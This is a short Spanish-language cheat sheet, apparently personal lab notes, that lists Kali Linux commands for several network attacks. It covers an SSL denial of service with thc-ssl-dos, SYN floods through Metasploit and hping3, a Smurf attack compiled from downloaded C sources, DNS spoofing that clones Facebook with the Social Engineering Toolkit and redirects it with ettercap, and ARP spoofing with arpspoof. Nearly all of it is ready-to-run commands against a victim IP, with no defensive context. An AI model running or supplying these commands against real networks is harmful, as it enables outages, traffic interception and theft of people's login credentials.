Ataque  THC-SSL-DOS
En una terminal de kali Linux:
  *********************   thc-ssl-dos  192.168.0.1 -p 443 --accept
	
	
Ataque  TCP-SYNC-FLOOD
En un terminal de kali Linux:
	msfconsole
	use auxiliary/dos/tcp/synflood
	show options (para ver la forma de configuaracion)
	set rhost 192.168.0.1(ip del atacado)
	exploit
	***********************    hping3 --syn -i u1 -S -p 80 IP( VICTIMA)
	
	
	hpinh3 -p 80 -S --flood 192.168.0.1 
	
Ataque  SMURF

En una terminal de Kali Linux, ubicandoneos en al carpoeta smurf (descargada)
	1.- compitacion de archivos
	sudo gcc smurf.c -o smurf 
	sudo gcc flooder_udp.c -o flooder_udp 
	2.- ataque
	./smurf 192.168.0.1 broadcast.txt  0 0 1024 
	
	***************************   hping3 -1 --flood IP(VICTIMA) -a IP(BROADCAST)
	
Ataque DNS SPOOFING
En kali Linux: Aplicaciones –> Kali Linux –> Exploitation Tools –> Social Engineering Toolkit –> se-toolkit
	1 , 2 , 3 , 2
	Ip atacante 
	https://www.facebook.com/
	
	Editar el archivo /usr/share/ettercap/etter.dns
	http://www.facebook.es A  IP_destino
	*.facebook.* A  IP_destino
	http://www.facebook.es PTR  IP_destino
	
	****************************    ettercap -Tqi eth1 -P dns_spoof -M arp // //
	
Ataque ARP_SPOOFING
	*****************************    arpspoof -i eth1 -t IP(VICTIMA) IP(A SUPLANTA)
	

